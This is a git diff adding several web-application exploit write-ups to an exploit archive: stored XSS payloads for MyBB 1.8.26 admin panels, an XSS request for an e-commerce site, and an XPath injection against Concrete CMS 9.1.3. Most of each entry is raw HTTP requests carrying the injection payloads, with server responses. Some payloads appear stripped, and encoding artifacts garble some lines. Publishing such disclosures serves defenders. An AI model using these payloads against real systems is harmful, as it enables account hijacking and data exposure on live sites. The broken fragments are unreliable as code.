1.8.26 - Stored Cross-Site Scripting (XSS) +# Exploit Author: Andrey Stoykov +# Software Link: https://mybb.com/versions/1.8.26/ +# Version: 1.8.26 +# Tested on: Ubuntu 20.04 + +Stored XSS #1: + + +To reproduce do the following: + +1. Login as administrator user +2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> = +"Global Templates"=20 +3. Select "Add New Template" and enter payload "> + + +// HTTP POST request showing XSS payload + +POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp= +late HTTP/1.1 +Host: 192.168.139.132 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= +101 Firefox/106.0 +[...] + +my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D">&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing + + +// HTTP redirect response to specific template + +HTTP/1.1 302 Found +Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= +erl/v5.16.3 +Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title= +=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1 +[...] + + +// HTTP GET request to newly created template + +GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1 +Host: 192.168.139.132 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= +101 Firefox/106.0 +[...] + + +// HTTP response showing unsanitized XSS payload + +HTTP/1.1 200 OK +Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= +erl/v5.16.3 +X-Powered-By: PHP/5.6.40 +[...] + + +"> +[...] + + +Stored XSS #2: + +To reproduce do the following: + +1. Login as administrator user +2. Browse to "Forums and Posts" -> "Forum Management" +3. Select "Add New Forum" and enter payload "> + + +// HTTP POST request showing XSS payload + +POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP= +/1.1 +Host: 192.168.139.132 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= +101 Firefox/106.0 +[...] + +my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D">&description=3D"> + + +Stored XSS #3: + + +To reproduce do the following: + +1. Login as administrator user +2. Browse to "Forums and Posts" -> "Forum Announcements" +3. Select "Add Announcement" and enter payload "> + + +// HTTP POST request showing XSS payload + +POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H= +TTP/1.1 +Host: 192.168.139.132 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= +101 Firefox/106.0 +[...] + +my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D">&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202= +2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea= +r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D">&fid=3D2&allowmycode=3D1&allowsmilies=3D1 + + +// HTTP response showing successfully added an anouncement + +HTTP/1.1 302 Found +Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= +erl/v5.16.3 +[...] + + +// HTTP GET request to fetch forum URL + +GET /mybb_1826/ HTTP/1.1 +Host: 192.168.139.132 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= +101 Firefox/106.0 +[...] + + +// HTTP response showing unsanitized XSS payload + +HTTP/1.1 200 OK +Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= +erl/v5.16.3 +[...] + +">= + + + + +--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d-- \ No newline at end of file diff --git a/exploits/php/webapps/51140.txt b/exploits/php/webapps/51140.txt new file mode 100644 index 000000000..085d43f34 --- /dev/null +++ b/exploits/php/webapps/51140.txt @@ -0,0 +1,57 @@ +## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS) +## Author: nu11secur1ty +## Date: 11.23.2022 +## Vendor: https://github.com/winston-dsouza +## Software: https://github.com/winston-dsouza/ecommerce-website +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website + +## Description: +The value of the eMail request parameter is copied into the value of +an HTML tag attribute which is encapsulated in double quotation marks. +The attacker can trick the users of this system, very easy to visit a +very dangerous link from anywhere, and then the game will over for +these customers. +Also, the attacker can create a network from botnet computers by using +this vulnerability. + +## STATUS: HIGH Vulnerability - CRITICAL + +[+] Exploit: + +```POST +POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost +HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f +Origin: http://pwnedhost.com +Upgrade-Insecure-Requests: 1 +Referer: http://pwnedhost.com/ecommerce/index.php +Content-Type: application/x-www-form-urlencoded +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +Content-Length: 0 +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website) + +## Proof and Exploit: +[href](https://streamable.com/3r4t36) + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51144.txt b/exploits/php/webapps/51144.txt new file mode 100644 index 000000000..08f735126 --- /dev/null +++ b/exploits/php/webapps/51144.txt @@ -0,0 +1,265 @@ +## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection +## Author: nu11secur1ty +## Date: 11.28.2022 +## Vendor: https://www.concretecms.org/ +## Software: https://www.concretecms.org/download +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 + +## Description: +The URL path folder `3` appears to be vulnerable to XPath injection attacks. +The test payload 50539478' or 4591=4591-- was submitted in the URL +path folder `3`, and an XPath error message was returned. +The attacker can flood with requests the system by using this +vulnerability to untilted he receives the actual paths of the all +content of this system which content is stored on some internal or +external server. + +## STATUS: HIGH Vulnerability + +[+] Exploits: +00: +```GET +GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js +HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 +Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +Content-Length: 0 +``` + +[+] Response: + +```HTTP +HTTP/1.1 500 Internal Server Error +Date: Mon, 28 Nov 2022 15:32:22 GMT +Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 +X-Powered-By: PHP/7.4.30 +Connection: close +Content-Type: text/html;charset=UTF-8 +Content-Length: 592153 + + + + + + + Concrete CMS has encountered an issue. + +